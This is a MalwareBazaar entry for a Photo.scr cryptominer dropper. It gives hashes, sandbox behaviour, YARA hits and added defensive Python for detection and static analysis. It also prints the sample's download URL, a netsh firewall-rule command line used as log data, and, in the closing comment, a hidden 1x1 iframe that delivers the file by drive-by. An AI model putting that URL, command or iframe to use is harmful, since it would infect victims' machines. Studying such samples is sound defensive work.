MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



CoinMiner


Vendor detections: 17



SHA256 hash: ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
SHA3-384 hash: 31aeb3ca8da8dd11d269b6eb175bc868c1fe1b82d1800d19e1cc4691deb7ab0f9fe73ff2e2341af8cd2c4d53022173c2
SHA1 hash: 1f4d13fdd0bf0b0251b31b0afa2a9c2fb0b0140e
MD5 hash: 9f3069e77d062da63b7ba5c1f35e9937
humanhash: fish-juliet-seven-violet
File name:Photo.scr
Signature CoinMiner
File size:6'227'160 bytes
First seen:2025-02-21 09:36:31 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 91ae93ed3ff0d6f8a4f22d2edd30a58e (48 x CoinMiner)
ssdeep 98304:RLJSThOfTCiFBXmfFs+JhEpCVoR8oMEOJ6Ty3RvX+UGD823FUuzmH:LBfTCiUs0VSLOJgyBGUA8Ch8
TLSH T1BD563345F4809837F139153625F884B2B07DBC7297244BDBA39E2AA56E317D83339A4E
TrID 38.7% (.EXE) Microsoft Visual C++ compiled executable (generic) (16529/12/5)
24.6% (.EXE) Win64 Executable (generic) (10522/11/4)
11.8% (.EXE) Win16 NE executable (generic) (5038/12/1)
10.5% (.EXE) Win32 Executable (generic) (4504/4/1)
4.7% (.EXE) OS/2 Executable (generic) (2029/13)
Magika pebin
dhash icon 7c70747474d67274 (47 x CoinMiner)
Reporter skocherhan
Tags:CoinMiner exe


skocherhan
http://109.137.108.215:8083/Photo.scr

Intelligence


File Origin
# of uploads :
1
# of downloads :
266
Origin country :
GB
Vendor Threat Intelligence
Malware family:
n/a
ID:
1
File name:
Video.scr
Verdict:
Malicious activity
Analysis date:
2024-07-25 06:09:18 UTC
Tags:
python upx mozi botnet ftp

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict:
Malicious
Score:
99.9%
Tags:
xmrig lien
Result
Verdict:
Malware
Maliciousness:

Behaviour
Launching a service
Creating a file in the Windows subdirectories
Searching for synchronization primitives
Launching cmd.exe command interpreter
DNS request
Sending a UDP request
Connection attempt
Creating synchronization primitives
Sending a custom TCP request
Creating a file in the %temp% subdirectories
Restart of the analyzed sample
Running batch commands
Creating a process with a hidden window
Creating a file
Creating a process from a recently created file
Creating a service
Enabling autorun for a service
Launching the process to change the firewall settings
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-debug anti-vm coinminer compiled-script masquerade microsoft_visual_cc miner obfuscated overlay packed packer_detected pup pyinstaller stealer xmrig
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary can be suspicious or malicious.
Result
Threat name:
Detection:
malicious
Classification:
evad.mine
Score:
100 / 100
Signature
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Creates files with lurking names (e.g. Crack.exe)
Drops PE files to the user root directory
Found API chain indicative of debugger detection
Machine Learning detection for sample
Modifies the windows firewall
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Uses netsh to modify the Windows network and firewall settings
Yara detected Xmrig cryptocurrency miner
Behaviour
Behavior Graph:
Behavior Graph: ID 701653; sample Photo.scr; start date 12/09/2022; architecture WINDOWS; score 100. The rendered graph is not reproduced here; the nodes recoverable from it are listed below.
Network indicators: xmr.crypto-pool.fr; router.utorrent.com; 4 other IPs or domains (first stage); 185.64.121.221 (XXLNETNL, Netherlands); 2.44.116.41 (VODAFONE-IT-ASNIT, Italy); 98 other IPs or domains (HelpPane.exe second stage)
Process tree: Photo.scr -> Photo.scr -> cmd.exe (x3) -> HelpPane.exe (x2) and conhost.exe; HelpPane.exe -> HelpPane.exe -> xmrig.exe, cmd.exe (x2), 2 other processes, each with conhost.exe; svchost.exe -> MpCmdRun.exe -> conhost.exe; 7 other top-level processes
Files dropped by Photo.scr: C:\Users\user\AppData\Local\...\xmrig.exe (PE32); C:\Users\user\...\ftpcrack.exe.manifest (XML); C:\Users\user\AppData\Local\...\config.json (ASCII); 24 other files (none is malicious)
Files dropped by HelpPane.exe: C:\Windows\Temp\_MEI58082\xmrig.exe (PE32); C:\Windows\Temp\_MEI58082\config.json (ASCII); C:\Windows\Temp\_MEI58082\win32service.pyd (PE32); 23 other files (none is malicious); C:\Windows\Temp\config (ASCII)
Files dropped by cmd.exe: C:\Users\user\HelpPane.exe (PE32); C:\Users\user\HelpPane.exe:Zone.Identifier (ASCII); C:\Windows\Temp\xmrig.exe (PE32); C:\Windows\Temp\config.json (ASCII)
Files dropped by the HelpPane.exe copies launched from cmd.exe: C:\Users\user\AppData\Local\...\xmrig.exe (PE32); C:\Users\user\AppData\Local\Temp\...\back.jpg (PE32); C:\Users\user\...\ftpcrack.exe.manifest (XML); C:\Users\user\AppData\Local\...\config.json (ASCII); 24 other files (1 malicious); 24 other files (none is malicious)
Signatures on graph nodes: Snort IDS alert for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 4 other signatures; Found API chain indicative of debugger detection (Photo.scr); Contains functionality to infect the boot sector (Photo.scr); Creates files with lurking names (e.g. Crack.exe) (Photo.scr, HelpPane.exe); Changes security center settings (notifications, updates, antivirus, firewall) (svchost.exe); Drops PE files to the user root directory (cmd.exe); Multi AV Scanner detection for dropped file (xmrig.exe, HelpPane.exe); Uses netsh to modify the Windows network and firewall settings (HelpPane.exe); Modifies the windows firewall (HelpPane.exe)
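The behaviours the sandboxes report above translate directly into process-creation hunting rules: HelpPane.exe dropped to C:\Users\user\ and re-executed from there (Windows ships HelpPane.exe in C:\Windows, so a copy in a profile root is a masquerade), netsh used to change firewall settings, and xmrig.exe launched from a C:\Windows\Temp\_MEI<pid> extraction directory. The Python below is an added example, not code from MalwareBazaar or any of the vendors quoted on this page. It runs those rules over a constructed set of Sysmon-style process-creation records (Image|CommandLine|ParentImage); the records are invented for the demo and only their paths mirror the report, and the rule names are my own.

```python
import ntpath   # Windows path semantics regardless of host OS
import re
from dataclasses import dataclass

# Constructed Sysmon-style process-creation records: Image|CommandLine|ParentImage.
# Invented for the demo; only the paths mirror the sandbox report above.
SAMPLE_LOG = r"""
# benign baseline: the real HelpPane.exe lives in C:\Windows
C:\Windows\HelpPane.exe|C:\Windows\HelpPane.exe -Embedding|C:\Windows\System32\svchost.exe
C:\Windows\System32\netsh.exe|netsh interface show interface|C:\Windows\System32\cmd.exe
# activity modelled on the report: copy in the user root, firewall change, miner from _MEI dir
C:\Users\user\HelpPane.exe|C:\Users\user\HelpPane.exe|C:\Windows\System32\cmd.exe
C:\Windows\System32\netsh.exe|netsh advfirewall firewall add rule name=Updater dir=in action=allow program=C:\Users\user\HelpPane.exe|C:\Users\user\HelpPane.exe
C:\Windows\Temp\_MEI58082\xmrig.exe|xmrig.exe -c config.json|C:\Users\user\HelpPane.exe
"""


@dataclass
class Event:
    image: str
    command_line: str
    parent_image: str


def parse_events(text):
    """Parse the pipe-separated records, skipping blanks and '#' comments."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        image, cmd, parent = line.split("|", 2)
        events.append(Event(image, cmd, parent))
    return events


LEGIT_HELPPANE_DIR = r"c:\windows"
# a PE sitting directly in a profile root, e.g. C:\Users\user\HelpPane.exe
USER_ROOT_PE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.(exe|scr|dll)$", re.I)
# PyInstaller onefile extraction directory, e.g. ...\Temp\_MEI58082\...
MEI_TEMP_DIR = re.compile(r"\\_MEI\d+\\", re.I)
NETSH_FIREWALL = re.compile(r"\b(advfirewall|firewall)\b", re.I)
MINER_NAMES = {"xmrig.exe"}


def check_event(ev):
    """Return the rule names this single event triggers (empty list if none)."""
    hits = []
    base = ntpath.basename(ev.image).lower()
    folder = ntpath.dirname(ev.image).lower()
    if base == "helppane.exe" and folder != LEGIT_HELPPANE_DIR:
        hits.append("masquerade_helppane_outside_windows")
    if USER_ROOT_PE.match(ev.image):
        hits.append("pe_executed_from_user_root")
    if MEI_TEMP_DIR.search(ev.image):
        hits.append("executed_from_pyinstaller_mei_temp")
    if base in MINER_NAMES:
        hits.append("known_miner_binary_name")
    if base == "netsh.exe" and NETSH_FIREWALL.search(ev.command_line):
        hits.append("netsh_firewall_modification")
    return hits


def scan(text):
    """Run every rule over every record; returns (image, parent, rule) triples."""
    alerts = []
    for ev in parse_events(text):
        for rule in check_event(ev):
            alerts.append((ev.image, ev.parent_image, rule))
    return alerts


if __name__ == "__main__":
    for image, parent, rule in scan(SAMPLE_LOG):
        print(f"{rule:38} {image}  (parent: {parent})")
```

The two baseline records produce no alerts: a HelpPane.exe under C:\Windows and a netsh call that only lists interfaces are normal. Feed scan() the Image/CommandLine/ParentImage columns of real Sysmon Event ID 1 data and widen MINER_NAMES and MEI_TEMP_DIR as your own telemetry dictates.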
Threat name:
Win32.Exploit.Phominer
Status:
Malicious
First seen:
2019-10-28 14:00:01 UTC
File Type:
PE (Exe)
Extracted files:
289
AV detection:
35 of 38 (92.11%)
Threat level:
  5/5
Result
Malware family:
Score:
  10/10
Tags:
family:gozi family:xmrig banker defense_evasion discovery isfb miner persistence privilege_escalation pyinstaller trojan upx
Behaviour
Checks SCSI registry key(s)
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Detects Pyinstaller
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
UPX packed file
ACProtect 1.3x - 1.4x DLL software
Executes dropped EXE
Loads dropped DLL
Boot or Logon Autostart Execution: Port Monitors
Contacts a large (1246) amount of remote hosts
Modifies Windows Firewall
Creates a large amount of network flows
XMRig Miner payload
Gozi
Gozi family
Xmrig family
xmrig
Verdict:
Malicious
Tags:
Win.Malware.F857af-9776823-0
YARA:
n/a
Unpacked files
SHA256 hash:
ebcdf536447cba219a13756c00c97b4ed5fea47f2cbf2283ea86e80216d3822e
MD5 hash:
9f3069e77d062da63b7ba5c1f35e9937
SHA1 hash:
1f4d13fdd0bf0b0251b31b0afa2a9c2fb0b0140e
Detections:
PyInstaller
SHA256 hash:
7a74da389fbd10a710c294c2e914dc6f18e05f028f07958a2fa53ac44f0e4b90
MD5 hash:
d34a527493f39af4491b3e909dc697ca
SHA1 hash:
afee32fcd9ce160680371357a072f58c5f790d48
SHA256 hash:
e82510adc44c4ea1fb0f22b1c3550d0a0152061e7489e5fbcf51952a55c8a4ce
MD5 hash:
a42c81a1edeeeed6a24de8b8cbeaf8f4
SHA1 hash:
7e904cfe7765a947e93a72d05354abdefbcba84c
SHA256 hash:
05508fcece26d5de9205fab70af8e81297b145e5d8a812f03df1136de49dcd8a
MD5 hash:
808c7ba93a495d70a840680e852a2db3
SHA1 hash:
ea6a20629abd748613e2cc8f9897b568ae696639
Detections:
XMRig PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 MAL_XMR_Miner_May19_1 XMRIG_Monero_Miner
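The parent file above is detected as PyInstaller and the sandbox saw its bootloader unpack xmrig.exe, config.json and win32service.pyd into C:\Windows\Temp\_MEI58082. That unpacking is just PyInstaller's onefile CArchive, appended as an overlay to the bootloader PE, and it can be carved statically without running the sample. The Python below is an added example, not code from MalwareBazaar, PyInstaller or any vendor quoted here: it assembles a constructed miniature archive (invented payloads; only the entry names are copied from the report) using the PyInstaller 2.1+ cookie layout, then parses it back and lists which bundled entries are themselves PE files.

```python
import struct
import zlib

# PyInstaller CArchive layout: [bootloader PE][bundled files][table of contents][88-byte cookie]
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"       # magic, package length, TOC offset, TOC length, Python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)          # 88 bytes (PyInstaller >= 2.1)
TOC_ENTRY_FMT = "!IIIIBc"       # entry length, data offset, compressed len, uncompressed len, zlib flag, type code
TOC_ENTRY_HDR = struct.calcsize(TOC_ENTRY_FMT)     # 18 bytes, followed by a NUL-padded name

# Constructed fixture modelled on the files seen in _MEI58082. Payload bytes are invented.
# Type codes: "b" bundled binary, "x" data file, "z" PYZ archive.
FIXTURE_ENTRIES = [
    ("xmrig.exe", "b", b"MZ" + b"\x90" * 200, True),
    ("win32service.pyd", "b", b"MZ" + b"\0" * 64, False),
    ("config.json", "x", b'{"pools":[{"url":"pool.example:3333"}]}', True),
    ("PYZ-00.pyz", "z", b"PYZ\0" + b"\0" * 32, False),
]


def build_onefile_sample(entries=FIXTURE_ENTRIES, pyvers=311, pylib=b"python311.dll"):
    """Assemble a fake onefile executable: a stub 'PE' followed by a CArchive overlay."""
    data, toc = bytearray(), bytearray()
    for name, typ, payload, compress in entries:
        blob = zlib.compress(payload) if compress else payload
        offset = len(data)
        data += blob
        name_b = name.encode() + b"\0"
        entry_len = TOC_ENTRY_HDR + len(name_b)
        pad = (16 - entry_len % 16) % 16            # PyInstaller pads each TOC entry to 16 bytes
        toc += struct.pack(TOC_ENTRY_FMT, entry_len + pad, offset, len(blob), len(payload),
                           1 if compress else 0, typ.encode())
        toc += name_b + b"\0" * pad
    pkg_len = len(data) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(data), len(toc), pyvers, pylib)
    stub = b"MZ" + b"\0" * 510                       # stands in for the bootloader PE
    return stub + bytes(data) + bytes(toc) + cookie


def parse_carchive(exe):
    """Locate the cookie, walk the TOC and return the bundled files, or None if not PyInstaller."""
    magic_pos = exe.rfind(MAGIC)    # search from the end: the bootloader code itself also contains MAGIC
    if magic_pos < 0 or magic_pos + COOKIE_SIZE > len(exe):
        return None
    _, pkg_len, toc_pos, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FMT, exe, magic_pos)
    pkg_start = magic_pos + COOKIE_SIZE - pkg_len   # TOC offsets are relative to the package start
    if pkg_start < 0:
        return None
    files, i, end = {}, pkg_start + toc_pos, pkg_start + toc_pos + toc_len
    while i < end:
        entry_len, off, clen, ulen, zflag, typ = struct.unpack_from(TOC_ENTRY_FMT, exe, i)
        name = exe[i + TOC_ENTRY_HDR:i + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        blob = exe[pkg_start + off:pkg_start + off + clen]
        content = zlib.decompress(blob) if zflag else blob
        if len(content) != ulen:
            raise ValueError(f"length mismatch for {name}")
        files[name] = (typ.decode(), content)
        i += entry_len
    return {"pyvers": pyvers, "pylib": pylib.rstrip(b"\0").decode(), "files": files}


def embedded_pe_names(parsed):
    """Bundled entries that are themselves PE files: what the bootloader writes into _MEI<pid>."""
    return sorted(name for name, (_typ, content) in parsed["files"].items() if content[:2] == b"MZ")


if __name__ == "__main__":
    info = parse_carchive(build_onefile_sample())
    print("python", info["pyvers"], info["pylib"])
    for name, (typ, content) in info["files"].items():
        print(f"  {typ} {name:20} {len(content)} bytes")
    print("embedded PE files:", embedded_pe_names(info))
```

parse_carchive() assumes the 88-byte cookie introduced in PyInstaller 2.1; builds older than that used a 24-byte cookie without the pylib name and need the shorter format. On a real sample, pass the file's bytes and inspect the "b" and "x" entries first: an embedded xmrig.exe and a config.json with pool URLs identify a miner dropper without executing it.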

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:BLOWFISH_Constants
Author:phoul (@phoul)
Description:Look for Blowfish constants
Rule name:DebuggerCheck__API
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerCheck__QueryInfo
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__ConsoleCtrl
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:DebuggerException__SetConsoleCtrl
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:Disable_Defender
Author:iam-py-test
Description:Detect files disabling or modifying Windows Defender, Windows Firewall, or Microsoft Smartscreen
Rule name:golang_bin_JCorn_CSC846
Author:Justin Cornwell
Description:CSC-846 Golang detection ruleset
Rule name:ldpreload
Author:xorseed
Reference:https://stuff.rop.io/
Rule name:MAL_packer_lb_was_detected
Author:0x0d4y
Description:Detect the packer used by Lockbit4.0
Rule name:MAL_XMR_Miner_May19_1
Author:Florian Roth
Description:Detects Monero Crypto Coin Miner
Reference:https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Rule name:MAL_XMR_Miner_May19_1_RID2E1B
Author:Florian Roth
Description:Detects Monero Crypto Coin Miner
Reference:https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Rule name:MD5_Constants
Author:phoul (@phoul)
Description:Look for MD5 constants
Rule name:pe_detect_tls_callbacks
Rule name:PE_File_pyinstaller
Author:Didier Stevens (https://DidierStevens.com)
Description:Detect PE file produced by pyinstaller
Reference:https://isc.sans.edu/diary/21057
Rule name:PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20
Author:Florian Roth (Nextron Systems)
Description:Detects XMRIG crypto coin miners
Reference:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Rule name:PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20_RID33BA
Author:Florian Roth
Description:Detects XMRIG crypto coin miners
Reference:https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Rule name:PyInstaller
Author:@bartblaze
Description:Identifies executable converted using PyInstaller. This rule by itself does NOT necessarily mean the detected file is malicious.
Rule name:RANSOMWARE
Author:ToroGuitar
Rule name:RIPEMD160_Constants
Author:phoul (@phoul)
Description:Look for RIPEMD-160 constants
Rule name:SEH__vectored
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:SHA1_Constants
Author:phoul (@phoul)
Description:Look for SHA1 constants
Rule name:SHA512_Constants
Author:phoul (@phoul)
Description:Look for SHA384/SHA512 constants
Rule name:suspicious_packer_section
Author:@j0sm1
Description:The packer/protector section names/keywords
Reference:http://www.hexacorn.com/blog/2012/10/14/random-stats-from-1-2m-samples-pe-section-names/
Rule name:Sus_Obf_Enc_Spoof_Hide_PE
Author:XiAnzheng
Description:Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique(can create FP)
Rule name:ThreadControl__Context
Reference:https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
Rule name:UPXProtectorv10x2
Author:malware-lu
Rule name:UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
Author:malware-lu
Rule name:upx_largefile
Author:k3nr9
Rule name:WHIRLPOOL_Constants
Author:phoul (@phoul)
Description:Look for WhirlPool constants
Rule name:XMRIG_Miner
Rule name:XMRIG_Monero_Miner
Author:Florian Roth (Nextron Systems)
Description:Detects Monero mining software
Reference:https://github.com/xmrig/xmrig/releases
Rule name:xmrig_v1
Author:RandomMalware

File information


The table below shows additional information about this malware sample such as delivery method and external references.

  
Delivery method
Distributed via drive-by

BLint


The following table provides more information about this file using BLint. BLint is a binary linter that checks the security properties and capabilities of executables.

Findings
ID: CHECK_AUTHENTICODE
Title: Missing Authenticode
Severity: high

ID: CHECK_DLL_CHARACTERISTICS
Title: Missing dll Security Characteristics (HIGH_ENTROPY_VA)
Severity: high

Reviews
ID: WIN32_PROCESS_API
Capabilities: Can Create Process and Threads
Evidence: KERNEL32.dll::CreateProcessW, KERNEL32.dll::CloseHandle

ID: WIN_BASE_API
Capabilities: Uses Win Base API
Evidence: KERNEL32.dll::TerminateProcess, KERNEL32.dll::LoadLibraryExW, KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetDriveTypeW, KERNEL32.dll::GetStartupInfoW, KERNEL32.dll::GetCommandLineW, KERNEL32.dll::GetCommandLineA

ID: WIN_BASE_EXEC_API
Capabilities: Can Execute other programs
Evidence: KERNEL32.dll::WriteConsoleW, KERNEL32.dll::ReadConsoleW, KERNEL32.dll::SetConsoleCtrlHandler, KERNEL32.dll::SetStdHandle, KERNEL32.dll::GetConsoleMode, KERNEL32.dll::GetConsoleCP

ID: WIN_BASE_IO_API
Capabilities: Can Create Files
Evidence: KERNEL32.dll::CreateDirectoryW, KERNEL32.dll::CreateFileW, KERNEL32.dll::DeleteFileW, KERNEL32.dll::RemoveDirectoryW, KERNEL32.dll::SetDllDirectoryW
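Both BLint findings can be read straight out of the PE optional header: Authenticode presence is the size field of data directory 4 (the certificate table), and HIGH_ENTROPY_VA is bit 0x0020 of DllCharacteristics, which sits at offset 70 in both PE32 and PE32+ optional headers. The Python below is an added example, not BLint's code or anything from this page; it reproduces those two checks (plus the neighbouring DYNAMIC_BASE, NX_COMPAT and GUARD_CF bits) over constructed header-only fixtures, one weak like this sample and one hardened. A non-zero certificate directory only means a signature blob is attached; it says nothing about whether the signature verifies.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
HIGH_ENTROPY_VA = 0x0020
DYNAMIC_BASE = 0x0040
NX_COMPAT = 0x0100
GUARD_CF = 0x4000


def build_pe_header(pe32plus=True, dll_characteristics=0, cert_size=0):
    """Constructed fixture: a bare PE header with no sections, just enough for the checks."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)   # 64-byte DOS header
    machine = 0x8664 if pe32plus else 0x14C
    opt_size = 240 if pe32plus else 224
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0x22)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)    # optional header magic
    struct.pack_into("<H", opt, 70, dll_characteristics)
    dd_base = 112 if pe32plus else 96                                # start of the data directories
    # data directory 4 = certificate table: (file offset, size); a nonzero size means "signed"
    struct.pack_into("<II", opt, dd_base + 4 * 8, 0x1000 if cert_size else 0, cert_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


def pe_security_checks(data):
    """Read DllCharacteristics and the certificate directory from a PE image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                     # skip signature and 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:
        pe32plus = True
    elif magic == 0x10B:
        pe32plus = False
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    dllc = struct.unpack_from("<H", data, opt + 70)[0]
    dd_base = opt + (112 if pe32plus else 96)
    _cert_off, cert_size = struct.unpack_from("<II", data, dd_base + 4 * 8)
    return {
        "format": "PE32+" if pe32plus else "PE32",
        "authenticode_present": cert_size > 0,
        "high_entropy_va": bool(dllc & HIGH_ENTROPY_VA),
        "dynamic_base": bool(dllc & DYNAMIC_BASE),
        "nx_compat": bool(dllc & NX_COMPAT),
        "guard_cf": bool(dllc & GUARD_CF),
    }


def findings(checks):
    """Emit the two BLint-style findings shown on this page; HIGH_ENTROPY_VA only matters for 64-bit images."""
    out = []
    if not checks["authenticode_present"]:
        out.append(("CHECK_AUTHENTICODE", "Missing Authenticode", "high"))
    if checks["format"] == "PE32+" and not checks["high_entropy_va"]:
        out.append(("CHECK_DLL_CHARACTERISTICS",
                    "Missing dll Security Characteristics (HIGH_ENTROPY_VA)", "high"))
    return out


if __name__ == "__main__":
    weak = pe_security_checks(build_pe_header(pe32plus=True))
    hardened = pe_security_checks(build_pe_header(
        pe32plus=True, dll_characteristics=HIGH_ENTROPY_VA | DYNAMIC_BASE | NX_COMPAT | GUARD_CF, cert_size=0x2000))
    print("weak:", weak, findings(weak))
    print("hardened:", hardened, findings(hardened))
```

To run the same checks on a real file, pass open(path, "rb").read() to pe_security_checks(). A missing certificate table on a Windows executable is a strong prior for an unsigned drop like this one, but a present table still needs signature verification (for example with signtool or osslsigncode) before it counts as trust.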

Comments



commented on 2025-02-21 09:38:20 UTC

</html>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>